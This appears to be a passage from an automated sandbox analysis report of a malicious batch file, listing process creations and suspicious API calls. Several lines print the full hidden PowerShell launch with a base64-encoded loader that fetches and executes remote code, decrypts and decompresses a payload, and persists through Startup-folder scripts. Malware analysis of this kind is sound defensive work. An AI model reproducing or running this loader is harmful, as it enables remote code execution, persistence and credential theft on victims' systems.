                          Source: 10.2.powershell.exe.8ba0000.1.raw.unpack, jlmrt.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\uowzo4rEa5.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\didgwgwgoqljydvgxmqznirblkkzsrxppo"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeX